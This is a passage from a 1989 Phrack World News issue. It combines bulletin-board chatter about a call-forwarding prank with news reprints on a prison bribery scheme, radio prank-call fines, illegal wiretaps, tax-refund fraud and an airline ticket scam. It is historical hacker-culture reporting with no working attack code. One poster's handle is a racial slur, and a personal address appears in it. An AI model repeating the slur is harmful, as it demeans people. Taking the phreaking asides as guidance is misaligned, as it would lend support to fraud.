  3616. income and responsibilities for most geeks to grow up and I am glad Havoc is not
  3617. going to tolerate it.  Would be interesting to at least hear the alias(es) of
  3618. the people/person that did the forwarding.
  3619.  
  3620. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3621.  
  3622. Numb: 90 of 98                7/3/89 at 5:03 pm
  3623. Subj: I find this interesting...
  3624. Sect: General Messages
  3625. From: The Mechanic
  3626.  
  3627. I have seen Major Havoc post several messages recently (both here [The Free
  3628. World bulletin board] and elsewhere) on the topic of telephone security.  While
  3629. it was not explicitly mentioned, it was implied that some activities discussed
  3630. might not be entirely legal.  In fact, there is a logon message encouraging
  3631. users to post as much as possible, as well as upload and download software,
  3632. including software that may be copyrighted.  Now we see a message from MHavoc
  3633. that some of us may be looking forward to "BIG Surprises."  I do not know about
  3634. you, but I'm going to think twice before I post *anything* to this system, at
  3635. least until I am assured that material on this board is not being monitored by
  3636. C&P personnel.
  3637.  
  3638. I think that if MHavoc wants this system to go anywhere, he is going to have to
  3639. *prove* to us that he is not going to be narcing on people as a result of what
  3640. they post.
  3641.  
  3642. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3643.  
  3644. Numb: 91 of 98                7/3/89 at 5:23 pm
  3645. Subj: ...
  3646. Sect: General Messages
  3647. From: Major Havoc
  3648.  
  3649. The information was not supplied by myself.  It was information that was read
  3650. to me by C&P security people.  I stood there plainly denying that I even knew
  3651. what a modem was.
  3652.  
  3653. The bottom line is that you do not have to worry about me.  You need to worry
  3654. about the information that they already have.  They merely asked me if I knew
  3655. anything about it.  Of course I did not...seriously, I don't even know.
  3656.  
  3657.                                                               -Major Havoc
  3658.  
  3659. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3660.  
  3661. Numb: 93 of 98                7/3/89 at 8:29 pm
  3662. Subj: ...
  3663. Sect: General Messages
  3664. From: Juan Valdez
  3665.  
  3666. I am sure Major Havoc cannot reveal the name of the person who did it, since he
  3667. is under investigation, it would make matters more difficult to make his name
  3668. public.  I am sure we'd all like to know maybe after everything is all done
  3669. with.  This thing about C&P cracking down scares me.  I know that I have not
  3670. done anything like what you mentioned and I am not connected to anything
  3671. directly as far as I know.  Now you are getting me paranoid.
  3672.  
  3673.                                 Mike
  3674.  
  3675. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3676.  
  3677.  
  3678. Numb: 94 of 98                7/3/89 at 9:31 pm
  3679. Subj: Hmm...
  3680. Sect: General Messages
  3681. From: Mr. Mystery
  3682.  
  3683. When it becomes possible, please post his name, and, more
  3684. importantly, the date of his court appearance.  Might be worth
  3685. watching.
  3686.  
  3687.                                                            - MR. MYSTERY
  3688.  
  3689. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3690.  
  3691. Numb: 95 of 98                7/3/89 at 11:10 pm
  3692. Subj: That
  3693. Sect: General Messages
  3694. From: The Killer
  3695.  
  3696. Is he a local or just an upset user.  What sort of stuff was the
  3697. phone company upset about?  Phreakers or people tampering with
  3698. their equipment?  That is pretty messed up.
  3699.  
  3700. So long as my ass is clean, I really hope you get the idiot.  I
  3701. am curious --Is he a phone company employee?  How did he get into
  3702. the system?
  3703.  
  3704. [Killer/USAlliance] - FW:301/486-4515
  3705.  
  3706. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3707.  
  3708. Numb: 96 of 98                7/4/89 at 2:26 am
  3709. Subj: Things.........
  3710. Sect: General Messages
  3711. From: Hellraiser
  3712.  
  3713. Would I be correct to assume that this board is completely
  3714. "private."  At any rate, I would be interested in knowing who
  3715. this person causing the disturbance is/was (drop a hint).
  3716.  
  3717.  
  3718. Numb: 97 of 98                7/4/89 at 6:33 pm
  3719. Subj: Jesus...
  3720. Sect: General Messages
  3721. From: The Disk Jockey
  3722.  
  3723. Geez... Someone learns a few LMOS commands and they seem obsessed
  3724. with doing stupid things.
  3725.  
  3726. I have absolutely no idea why people would act wary towards
  3727. Havoc, I am sure that I and anyone else who ran a board would,
  3728. given the chance, burn the person disrupting the system.  What
  3729. the hell did you think?  Havoc should just let it slide?  I think
  3730. not.  People like that (doers of such cute call forwarding
  3731. things) should be screwed.  They are the people that give you a
  3732. bad reputation.
  3733.  
  3734.                                                        -The Disk Jockey
  3735.  
  3736. I hope he gets nailed, I just find it hard to believe that he
  3737. left any information that could lead back to him, as someone who
  3738. was at least smart enough to get into an LMOS or equivalent could
  3739. have at least some common sense, but I suppose his acts dictate
  3740. otherwise.
  3741.  
  3742. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3743.  
  3744. Numb: 98 of 98                7/4/89 at 7:21 pm
  3745. Subj: Well...
  3746. Sect: General Messages
  3747. From: Microchip
  3748.  
  3749. When it was on interchat, it said Major Havoc was fed up and it
  3750. was going to do this until we all calmed down
  3751.  
  3752. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3753. For those who never found out, the perpetrator of the call
  3754. forwarding was none other than SuperNigger (who is also
  3755. responsible for crashing Black Ice).  There never was any solid
  3756. proof that could be used and any comments about him leaving a
  3757. trail to follow back to him were bluffs. -KL
  3758. _______________________________________________________________________________
  3759.  
  3760. Conman Loses Prison Phone Privileges                         September 23, 1989
  3761. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3762. About a year ago there was a plot to steal $69 million from the
  3763. First National Bank of Chicago through a fraudulent wire-transfer
  3764. scheme masterminded by a man named Armand Moore.  Using the
  3765. telephone and a computer -- the tools of his trade, Mr. Moore
  3766. planned to transfer money from the accounts of corporate
  3767. customers at First National to his account in Switzerland.
  3768.  
  3769. He needed some inside help to bring it off, and he found two
  3770. young guys in the wire transfer room at the bank who were willing
  3771. to help.  Both of the clerks were fellows in their early
  3772. twenties, who had worked for the bank a couple years each.  Both
  3773. had come from families living in a ghetto neighborhood on the
  3774. south side of Chicago; but their families had raised them to be
  3775. honest.  Both had been average high school students; neither had
  3776. any previous criminal record of any sort; both had been given a
  3777. break by an employer who treated them fairly and allowed them to
  3778. rise to positions of trust:  handling huge sums of money --about
  3779. a hundred million dollars a day -- in the wire-transfer unit at
  3780. the bank.  Both showed great promise; then Armand Moore came
  3781. along.
  3782.  
  3783. Moore wined and dined these two kids; showed them the best of
  3784. times and what it was like to have a fancy apartment in a wealthy
  3785. neighborhood instead of living with your parents in an inner-city
  3786. ghetto.  Its not that they weren't guilty --after all, they did
  3787. provide the secret passwords and phrases which bank employees say
  3788. to one another on the telephone, and they did press the buttons
  3789. which sent $69 million dollars on its way to Europe -- but they
  3790. would not have done it if Armand Moore had not been there.
  3791.  
  3792. So instead of a career at the bank, the guys exchanged it for an
  3793. indictment for bank fraud; loss of their jobs; humiliation for
  3794. themselves and their families; and the right to say "convicted of
  3795. bank fraud" on future job applications.  Naturally, they are
  3796. blacklisted in the banking and computer industries for the rest
  3797. of their lives.  One of the guys said Armand had promised to give
  3798. him money to buy his mother a new coat.
  3799.  
  3800. The job at First National was bungled as we all know, two young
  3801. guys had their lives ruined, and the court took all this into
  3802. consideration when Armand Moore was sentenced to ten years in
  3803. prison last June.  But as Paul Harvey would say, "...then there
  3804. is the rest of the story...."
  3805.  
  3806. It seems Armand Moore was no stranger to bank fraud.  He had
  3807. previously pulled a couple of smaller jobs, using a telephone and
  3808. a computer to net about a million dollars from two banks in the
  3809. Detroit area.  The FBI had not previously connected him with
  3810. those jobs.  He had this money stashed away, waiting for him when
  3811. he got released from prison, which in this latest scheme, would
  3812. be a lot sooner than the government expected.
  3813.  
  3814. Mr. Moore is the sort of fellow who could sell the proverbial
  3815. ice-box to an Eskimo... or a newspaper subscription to a blind
  3816. man... he can get anybody to do anything it seems... by flirting
  3817. with them, showering them with attention, and if necessary, just
  3818. bribing them.  Now two more lives have been ruined by Armand
  3819. Moore, and his only regret is he got caught.
  3820.  
  3821. Since his trial in June, Armand Moore has been a guest of the
  3822. government at the federal penitentiary in downtown Chicago.  As a
  3823. long term resident, he's gotten to know a lot of the folks,
  3824. including the employees of the prison.  In particular, he got to
  3825. be very good friends with Randy W. Glass, age 28, an employee of
  3826. the prison in the computer facility there.  Glass' duties include
  3827. entering data into the prison computer about the inmates, their
  3828. sentences and other data.  Oh... is the story becoming clearer
  3829. now?
  3830.  
  3831. Glass and his wife live in Harvey, IL, a middle class suburb on
  3832. the south side of Chicago.  It seems like so many other people
  3833. who meet Armand Moore, Glass enjoyed the company of this older,
  3834. very sophisticated and friendly chap.  After several meetings in
  3835. the past three months, Glass was finally seduced by Moore's
  3836. money, like everyone else who meets him.  That, plus his pleasant
  3837. manners, his smooth conversation and his assurance that nothing
  3838. could go wrong led to Glass finally agreeing to accept a $70,000
  3839. bribe in exchange for punching a few buttons on the computer to
  3840. show Armand Moore's sentence was complete; him and a couple other
  3841. inmates who were sharing the same room at the prison.  Just
  3842. change a few details, punch a few buttons -- and to be on the
  3843. safe side, do it from home with your modem and terminal, using
  3844. the Warden's password which I just happen to have and will give
  3845. to you in exchange for your cooperation.
  3846.  
  3847. $70,000 was hard to resist.  But Glass was a prudent man, and he
  3848. asked what guarantee would he have of payment once Armand Moore
  3849. was released.  After all, hadn't he promised those fellows at the
  3850. bank all sorts of things and then tried to skip town immediately
  3851. when he thought the transfer had gone through?  He would even
  3852. cheat his fellow crooks, wouldn't he?
  3853.  
  3854. Moore offered a $20,000 "down payment" to show his intentions.  A
  3855. confederate outside the prison would meet Glass' wife and give
  3856. her the money.  Then the job would be done, and following Moore's
  3857. untimely release from the joint, the rest would be paid.  The
  3858. deal was made, alleges the government, and Armand Moore used a
  3859. pay phone at the prison that day to call his stepsister and have
  3860. her arrange to meet Mrs. Glass.  The money would be exchanged;
  3861. Glass was off two days later and would make the necessary
  3862. "adjustments" from his home computer; the prison roll would
  3863. reflect this on the next morning's roster of prisoners with the
  3864. notation "Time Served/Release Today."  They would meet that
  3865. evening and exchange the rest of the money.
  3866.  
  3867. All telephones at the prison, including the public pay phones,
  3868. are subject to monitoring.  A sign on each pay phone advises that
  3869. "your call may be monitored by an employee authorized to do so."
  3870. The FBI alleges that recordings were made of Moore on the phone
  3871. telling his stepsister that she should "...work with Randy, a
  3872. person affiliated with the law..." and that she would meet Mrs.
  3873. Glass the next day.  With a court ordered tap obtained a few
  3874. minutes later, the FBI heard Stephanie Glass agree to meet
  3875. Moore's stepsister at 5:45 AM the next morning in a parking lot
  3876. in Richton Park, IL.
  3877.  
  3878. At the appointed time the next morning, the two cars met in the
  3879. parking lot, and the FBI alleges the one woman handed the other a
  3880. package containing $20,000 in cash.  The FBI videotaped the
  3881. meeting and waited until Mrs. Glass had driven away.  They
  3882. followed her home, and arrested her at that time.  Randy Glass
  3883. was arrested at the prison when he arrived for work about an hour
  3884. later.  Armand Moore was arrested in his cell at the prison once
  3885. Glass had been taken into custody.  To do it the other way around
  3886. might have caused Glass to get tipped off and run away.
  3887.  
  3888. On Thursday, September 21, 1989 Mr. & Mrs. Glass and Armand Moore
  3889. appeared before United States Magistrate Joan Lefkow for
  3890. arraignment and finding of probable cause.  Finding probable
  3891. cause, she ordered all three held without bail at the prison
  3892. until their trial.  Randy Glass is now, so to speak, on the wrong
  3893. side of the bars at the place where he used to work.  He was
  3894. suspended without pay at the time of his arrest.
  3895.  
  3896. At the hearing, Magistrate Lefkow directed some particularly acid
  3897. comments to Mr. Moore, noting that he was forbidden to ever use
  3898. the telephone again for any reason for the duration of his
  3899. confinement, and was forbidden to ever be in the vicinity of the
  3900. computer room for any reason, also for the duration.
  3901.  
  3902. She noted, "...it seems to me you continue to seek the
  3903. conspiracy's objectives by using the telephone, and convincing
  3904. others to manipulate the computer..." you stand here today and
  3905. show no remorse whatsoever except that you were caught once
  3906. again.  Your prison record notes that on two occasions, prison
  3907. staff have observed you using the telephone and "...pressing the
  3908. touchtone buttons in a peculiar way during the call..." and that
  3909. you were counseled to stop doing it.  I will tell you now sir
  3910. that you are not to use the telephone for any reason for the
  3911. remainder of your current sentence.  I find probable cause to
  3912. hold you over for trial on the charge of bribery of a government
  3913. employee.  Stay away from the phones and computers at the prison
  3914. Mr. Moore!"
  3915.  
  3916. Like Gabriel Taylor at the First National Bank, neither Randy
  3917. Glass or his wife had any prior arrest record or conviction.  In
  3918. a foolish moment of greed, spurred on by a friendly fellow who
  3919. Randy really enjoyed talking to "...because he was so smart and
  3920. well-educated..." they now get to face prison and the loss of
  3921. everything in their lives.  When all three were leaving the
  3922. courtroom Thursday, Armand Moore snickered and smiled at the
  3923. audience.  He'll find other suckers soon enough.
  3924. ______________________________________________________________________
  3925.  
  3926.                                 ==Phrack Inc.==
  3927.  
  3928.                     Volume Three, Issue 28, File #11 of 12
  3929.  
  3930.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3931.             PWN                                                 PWN
  3932.             PWN        P h r a c k   W o r l d   N e w s        PWN
  3933.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  3934.             PWN               Issue XXVIII/Part 3               PWN
  3935.             PWN                                                 PWN
  3936.             PWN                 October 7, 1989                 PWN
  3937.             PWN                                                 PWN
  3938.             PWN          Created, Written, and Edited           PWN
  3939.             PWN               by Knight Lightning               PWN
  3940.             PWN                                                 PWN
  3941.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3942.  
  3943.  
  3944. FCC Orders Radio Station To Stop Phone Pranks                   August 30, 1989
  3945. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3946. The Federal Communications Commission has slapped Chicago radio
  3947. station WLUP-AM (1000) and WLUP-FM (97.9) with a $5000 fine and
  3948. threatened to pull their license for illegally broadcasting phone
  3949. calls to "unsuspecting individuals."
  3950.  
  3951. The FCC specifically cited "willful behavior and repeated
  3952. violations of its policy that recipients of phone calls from
  3953. radio stations must be informed in advance -- and on the air at
  3954. the start of the call -- that they are being broadcast."
  3955.  
  3956. In particular, the FCC noted that morning host Jonathon
  3957. Brandmeier and mid-day host Kevin Matthews were in frequent
  3958. violation of this rule.
  3959.  
  3960. Scott G. Ginsberg, president and chief executive officer of
  3961. Evergreen Media Corporation, parent company and license holder
  3962. for WLUP confirmed that his company had paid the $5000 fine
  3963. without protest for illegally broadcasting phone calls.  He
  3964. compared this punishment to receiving a traffic ticket.
  3965.  
  3966. Both Brandmeier and Matthews enjoy harassing people on the phone,
  3967. and broadcasting the reaction of their victims over the air.  One
  3968. of the calls placed by Matthews involved him posing as a police
  3969. officer.  He called a funeral home and spoke to the widow of a
  3970. man who died the day before.  He told her that her niece and
  3971. nephew, who were scheduled to come to the funeral home later that
  3972. day to help with burial arrangements had been arrested.  The
  3973. widow was not amused.  She filed suit against WLUP and Matthews.
  3974.  
  3975. Brandmeier likes to harass celebrities by managing to find their
  3976. unlisted home phone numbers and call them at 6:30 or 7:00 AM when
  3977. his show goes on the air.  He also pulls phone scams including
  3978. sending unwanted food orders; calling employers to provide
  3979. excuses for employees who won't be at work that day, and similar.
  3980. Always broadcasting the calls on the air, of course.
  3981.  
  3982. But it was the call to the grieving widow at the funeral home
  3983. which got the FCC livid.  The Commission contacted the station
  3984. that day, and an Enforcement Officer threatened to put the
  3985. station off the air that day -- in a matter of minutes when he
  3986. could get the order signed.
  3987.  
  3988. After some discussion, WLUP was permitted to continue
  3989. broadcasting, but a memo was circulated to all employees warning
  3990. that effective immediately, any violation of the phone rules
  3991. would lead to immediate termination.
  3992.  
  3993. But despite this, less than three months later, Brandmeier pulled
  3994. another of his obnoxious phone pranks.  This time, the FCC gave
  3995. him personally a $5000 fine, and told WLUP "either keep those two
  3996. under control on the air or you'll get your license yanked."
  3997.  
  3998. Now WLUP faces more sanctions, and the probable non-renewal of
  3999. its license when it expires December 1, 1989.  Afternoon disk
  4000. jockey Steve Dahl routinely broadcasts indecent material on his
  4001. show.  Daily topics of conversation include sadism and masochism,
  4002. child molestation, sexual behavior of all sorts, and frequent
  4003. slurs of the most vicious kind against gay people.  He uses
  4004. "street language" to express himself, of course, and has used the
  4005. famous "seven words you never say on the radio" more times than
  4006. anyone remembers.
  4007.  
  4008. The victims of the phone pranks have consulted with their own
  4009. attorney as a group, and he in turn is pressing the FCC to shut
  4010. down WLUP completely.
  4011.  
  4012. Ginsberg says he does not understand why the FCC is picking on
  4013. them.  He says it must be competing radio stations that would
  4014. like to see them off the air, since they are rated number three
  4015. in the Chicago area, which certainly says a lot about Chicagoan's
  4016. taste in radio entertainment.
  4017.  
  4018. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4019. - - - - - - -
  4020.  
  4021. Long time Phrack World News readers may have noticed a familiar name in this
  4022. article:  Steve Dahl.
  4023.  
  4024. Depending on how long you have been with us, you may wish to
  4025. refer to Phrack World News Issue Five/Part One (in Phrack Inc.
  4026. Volume One, Issue Six).  There is an article entitled "Mark Tabas
  4027. and Karl Marx Busted" and it is dated May 2, 1986.  Along with
  4028. this article is a short note that explains how an informant
  4029. (possibly the son of an agent of the Secret Service or Federal
  4030. Bureau of Investigation) was believed to be using the handle of
  4031. Jack or Will Bell and had helped the authorities get Tabas and
  4032. Marx.  It was widely known that he was from the 312 NPA --
  4033. Chicago, Illinois.
  4034.  
  4035. In the following issue of Phrack Inc. we have PWN Issue VI/Part 1
  4036. and an article entitled, "Marx and Tabas:  The Full Story."  This
  4037. article further explains how Steve Dahl was busted (for unknown
  4038. crimes) in Miami, Florida by the U.S. Secret Service and then
  4039. made a deal to help them get Karl Marx and Mark Tabas.
  4040.  
  4041. So is the Steve Dahl of WLUP in Chicago the same Steve Dahl from
  4042. Chicago that helped the U.S. Secret Service nail Mark Tabas and
  4043. Karl Marx?
  4044. _______________________________________________________________________________
  4045.  
  4046. Reach Out And Tap Someone Revisited                               July 30, 1989
  4047. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4048. In Phrack World News Issue XXVI/Part 2 there was an article about
  4049. two former employees of Cincinnati Bell (Leonard Gates and Robert
  4050. Draise) who claimed they had had engaged in numerous illegal taps
  4051. over a 12 year period at the request of their supervisors at
  4052. Cincinnati Bell and the Cincinnati Police Department.
  4053.  
  4054. Cincinnati Bell filed suit against the two men, Leonard Gates and
  4055. Robert
  4056. Draise, claiming both were liars out to get even with the company
  4057. after they had been fired for other reasons.
  4058.  
  4059. "'Taint necessarily so," said a judge who agreed the charges may
  4060. have some merit, and permitted the class action suit against
  4061. Cincinnati Bell to continue this past week.
  4062.  
  4063. The class action suit claims that Cincinnati Bell routinely
  4064. invaded the privacy of thousands of people in the area by
  4065. secretly tapping their phones at the request of police or FBI
  4066. officials over a twelve year period from 1972 - 1984.  The taps
  4067. were mainly applied against political dissidents during the
  4068. Vietnam era, and in more recent years, against persons under
  4069. investigation by the United States Attorney in southern Ohio,
  4070. without the permission of a court.
  4071.  
  4072. Now says the court, depending on the outcome of the class action
  4073. suit, the criminal trials of everyone in the past decade in
  4074. southern Ohio may have to be re-examined in light of illegal
  4075. evidence gained by the United States Attorney, via the FBI, as a
  4076. result of the complicity of Cincinnati Bell with that agency,
  4077. courtesy of Robert Draise and Leonard Gates.
  4078.  
  4079. The testimony this past week got *very messy* at times.  Gates
  4080. and Draise seem determined to tell every dirty thing they know
  4081. about Cincinnati Bell's security department from the dozen years
  4082. they worked there.  More details as the trial continues.
  4083. _______________________________________________________________________________
  4084.  
  4085. The Grim Phreaker Cleared In Phone Scam                           June 30, 1989
  4086. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4087. by Suzanne Getman (Syracuse Herald Journal)
  4088.  
  4089.             "We disposed of this on the basis of his
  4090. cooperation."
  4091.  
  4092. A college student who talked his way into being arrested in April
  4093. (by speaking with a chat operator) was cleared of charges against
  4094. him this week.  Kevin C.  Ashford aka The Grim Phreaker, age 22,
  4095. was arrested by sheriff's deputies on April 21 a mere five
  4096. minutes after using a payphone to speak with an operator on the
  4097. Onadaga Community College campus and charged with theft of
  4098. services, a misdemeanor.
  4099.  
  4100. Ashford admitted placing about 30 calls to a party lines known as
  4101. bridges by using phony credit card numbers and extenders.  "We
  4102. disposed of this on the basis of his cooperation, our problem
  4103. with proof, and his completion of 30 hours of community service,"
  4104. Assistant District Attorney Timothy Keough said.  Ashford had
  4105. cooperated by assisting and providing information to the
  4106. Sheriff's Department, the Federal Bureau of Investigation, and
  4107. the Secret Service for more than three weeks.  There was no
  4108. problem with proof however because Ashford admitted he was guilty
  4109. of all of the crimes.
  4110.  
  4111. Ashford was arrested in Onadaga Community College campus' Gordon
  4112. Student Center on April 21, minutes after he placed a call to a
  4113. nationwide party line called Systems 800 International (who
  4114. offered to drop charges if they could receive copies of Phrack
  4115. Inc. Newsletter from him and if he would work for them trapping
  4116. others).  Company officials said there is no way to establish the
  4117. cost of the fraudulent calls.  "Without a dollar amount, we
  4118. didn't have proof.  Without proof, we couldn't prosecute," Keough
  4119. said.
  4120.  
  4121.                          Article Submitted by DarkMage
  4122. _______________________________________________________________________________
  4123.  
  4124. Phony IRS Refunds By Computer                                   August 17, 1989
  4125. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4126. By John King (Boston Globe)
  4127.  
  4128.         "Computer Filer Got $325,000 In Phony Refunds, IRS
  4129. claims."
  4130.  
  4131. Clever tax preparers are one thing, but a clever bookkeeper who
  4132. allegedly pried 325,000 dollars from the Internal Revenue Service
  4133. found himself on the wrong side of the law yesterday, August 16.
  4134.  
  4135. In what may be the nation's first charge of electronic tax fraud,
  4136. IRS special agents yesterday arrested Alan N. Scott of West
  4137. Roxbury [a suburb of Boston], saying he claimed 45 fraudulent
  4138. income tax refunds for amounts ranging from
  4139. 3,000 dollars to 23,000 dollars.
  4140.  
  4141. The IRS charges that Scott, age 37, used the service's new
  4142. electronic filing system -- open only to tax preparers -- to
  4143. submit phony claims with assumed names and Social Security
  4144. numbers.  In some cases, the names used were of people in prison,
  4145. according to Chief Kenneth Claunch, IRS Criminal Investigation
  4146. Division.
  4147.  
  4148. "The computer age has spawned a new breed of criminal," Claunch
  4149. said in a statement.
  4150.  
  4151. New in tools, perhaps.  As for the basic idea -- filing a false
  4152. return in order to snare an unwarranted refund -- that's old hat,
  4153. admitted IRS spokeswoman Marti Melecio.
  4154.  
  4155. "I can't say that it's a new trick.  We've had fraud cases with
  4156. paper returns," Melecio said.  "The time frame is different,
  4157. though.  With electronic filings, the returns come back in two or
  4158. three weeks."
  4159.  
  4160. According to the IRS, Scott received electronic filing status on
  4161. January 31.  He did this by using a false Social Security number,
  4162. and making false statements on his application.  However, the IRS
  4163. also says Scott electronically filed 10 returns where he used his
  4164. own name as a preparer, and these returns appear to be
  4165. legitimate.
  4166.  
  4167. The scheme was uncovered by a "questionable refund detection
  4168. team," at the IRS service center in Andover, Massachusetts.
  4169. Also, the IRS credited a tip from an unnamed Boston bank "which
  4170. reported a suspicious electronic transfer of funds to an
  4171. individual," presumably Scott.
  4172.  
  4173. If convicted, Scott faces a possible prison sentence and up to
  4174. 250,000 dollars in fines on each of the counts of fraud.
  4175. _______________________________________________________________________________
  4176.  
  4177. Paris Computer Takes Law Into Its Own Hands                   September 6, 1989
  4178. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4179. >From The Guardian
  4180.  
  4181. A crusading computer has taken the law into its own hands and
  4182. caught 41,000 Parisians on charges of murder, extortion,
  4183. prostitution, drug trafficking and other serious crimes.  But the
  4184. big round-up ended in embarrassment after an admission by the
  4185. City Hall yesterday that the electronic "Batman" could not
  4186. tell the difference between a parking offense and gang warfare.
  4187. "The accused persons will be receiving letters of apology," an
  4188. official at the City Hall Treasury department said. "Instead of
  4189. receiving summons on criminal charges, they should have been sent
  4190. reminders of unpaid motoring fines in April.  Somehow the
  4191. standard codes we use for automatically issued reminders got
  4192. mixed up."
  4193.  
  4194. The first hint of the avenging computer's self-appointed mission
  4195. to clean up the capital came at the weekend.  Hundreds of
  4196. Parisians received printed letters accusing them of big crimes,
  4197. but demanding only petty fines for the major crimes of between
  4198. $50 and $150 (pounds - UK equivalent).  "About 41,000 people are
  4199. involved and some of the charges are quite weird," the official
  4200. admitted.  "One man has complained of being accused of dealing in
  4201. illegal veterinary products.  Unfortunately, other accusations
  4202. went much further, like man-slaughter through the administration
  4203. of dangerous drugs."  "There were a lot of cases of living off
  4204. immoral earnings, racketeering and murder."  The official said an
  4205. inquiry had been started to see if the caped computer had a human
  4206. accomplice.  So far, no one has asked the Joker if he was in
  4207. Paris last week.
  4208. _______________________________________________________________________________
  4209.  
  4210. Chalisti Magazine by the Chaos Computer Club
  4211. August 20, 1989
  4212. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4213. In the future, there will be an electronic magazine, published
  4214. by, and concerning the Chaos Computer Club.  It is called
  4215. Chalisti and the name is derived from "Kalisti," the Goddess of
  4216. Chaos and will, hopefully, stand for creative Chaos and not for
  4217. chaotic, but, as always only time will tell.
  4218.  
  4219. The idea is like this...
  4220.  
  4221. Over the different data networks, masses of information flow.  On
  4222. the Usenet it is about 100 MB/Month, on the CREN (Bitnet + CSNet)
  4223. the flow is about the same size.  On top of these flows, there is
  4224. the information from national networks like Zerberus, BTX and
  4225. Geonet.  Mostly, a person only gets information from one network
  4226. and that is why interesting information on data protection, data
  4227. security, alternative uses of computers, environment, university
  4228. etc. are being broadcast over only one network.
  4229.  
  4230. Information from the networks for the networks, but that is not
  4231. all.  There should emerge a list of editors, that is spread over
  4232. a large area, and works over the nets.  Information and and
  4233. opinions should be exchanged, but also further contacts will
  4234. emerge.
  4235.  
  4236. The first edition of Chalisti will presumably be published
  4237. mid-September.  Because of this, the list of editors is
  4238. relatively small, one will publish stuff from the newest
  4239. "Datenschleuder", the MIK-magazine and the most interesting
  4240. messages from the nets that appear in the following weeks.  But
  4241. as soon as the 2nd edition will appear, the content will be
  4242. different from the "Datenschleuder."
  4243.  
  4244. In Chalisti, copy and messages from the nets and other media
  4245. (MIK, and others) will be published as well.  Articles meant
  4246. especially for the Chalisti magazine are requested and these
  4247. articles will be published with the highest priority.
  4248.  
  4249. The magazine will be no bigger than 100 KB/Month.  In case of
  4250. doubt, articles will be kept for the forthcoming edition or for
  4251. the fall in copy in the Summer.  But it is also possible, that
  4252. too few articles are being sent in, in which case the content
  4253. will be spiced with information from DS, the nets and the
  4254. MIK-magazine.  In this way, a regular emerging of editions is
  4255. being secured.
  4256.  
  4257. The first edition is due 15th of September.  The second at the
  4258. end of October.  At that date, the holiday will be ended, and a
  4259. editorial and informal infrastructure will be built.  From then
  4260. on, there should be an edition every month.
  4261.  
  4262. The editorial part will presumably be done on EARN or CREN.  That
  4263. bears the advantage that quick reactions on recent messages will
  4264. be possible, as well as the possibility to talk it over at
  4265. Relay's or Galaxy Meetings, and in this way, an international
  4266. medium is available.  Writers of articles or editors from other
  4267. nets can be contacted, and there shouldn't be no technical
  4268. problems in getting the job done.  Especially on UUCP and
  4269. Zerberus, facilities will be created.
  4270.  
  4271. As ways of contacting the Editors, the following Networks are
  4272. available:
  4273.  
  4274.          EARN/CREN   - Distribution will be done over CHAMAS (107633@DOLUNI1).
  4275.                        There will be a board for Chalisti, as well as a CUG
  4276.                        for the board of Editors.  Contact there will be
  4277.                        151133@DOLUNI1.  Presumably, from the beginning of
  4278.                        October, the userid CHAMAINT@DOLUNI1 will be available.
  4279.  
  4280.          UUCP/Subnet - Contacting will be possible through chalist@olis,
  4281.                        ccc@mcshh and through ..!tmpmbx!DOLUNI1.bitnet!151133.
  4282.  
  4283.          UUCP/Dnet   - Contacting will be possible through simon@uniol.
  4284.                        Distribution will proceed through this id in
  4285.                        dnet.general.
  4286.  
  4287.          Zerberus    - At this moment: terra@mafia and terra@chaos-hh. From
  4288.                        mid-September on, presumably through chalist@subetha.
  4289.  
  4290.          BTXNet      - Unknown yet.
  4291.  
  4292.          GeoNet      - mbk1:chaos-team. Time will show, whether distribution
  4293.                        of the magazine will be done on GeoNet.
  4294.  
  4295. Contacting or distribution through FidoNet and MagicNet has been planned for,
  4296. but has to be built first.
  4297.  
  4298. Interested people are being asked to use these addresses.  For the absolute
  4299. uncontactable, there is a Snailmail address as well:
  4300.  
  4301. Frank Simon
  4302. 12 Kennedy Street
  4303. 2900 Oldenburg, FRG (West Germany)
  4304.  
  4305. 04411/592607 (Telephone)
  4306.  
  4307. Greets
  4308.  
  4309.      Terra
  4310. _______________________________________________________________________________
  4311.  
  4312. Computer-Based Airline Ticket Scam                              August 14, 1989
  4313. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4314. Taken from the Los Angeles Times
  4315.  
  4316. Phoenix police arrested four people as they continued to unravel
  4317. a bogus airline ticket ring that allegedly sold millions of
  4318. dollars of stolen tickets by advertising discounted fares in
  4319. national publications.  Investigators said the individuals put
  4320. together a major conspiracy by knowing how to access airline
  4321. computers to put travel itineraries in the computer system.  - -
  4322. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4323. - - - - -
  4324. In the interests of equal access to information for all, I have
  4325. decided to include some of the supposed deep secrets of how to
  4326. access airline computers and inset travel itineraries.
  4327.  
  4328. This can be done from virtually any telephone nationwide
  4329. (including a rotary dial telephone).  This can of course also be
  4330. done from a public payphone if you should decide to make sure
  4331. your identity is anonymous.
  4332.  
  4333. It is necessary to determine the phone number for an airline's
  4334. computer.  All you have to do is call 1-800 directory assistance
  4335. (1-800-555-1212).  Ask for Ozark Airlines reservations (a no
  4336. longer existent company that was purchased by Trans World Airways
  4337. [TWA] used here only as an example).  The operators on duty will
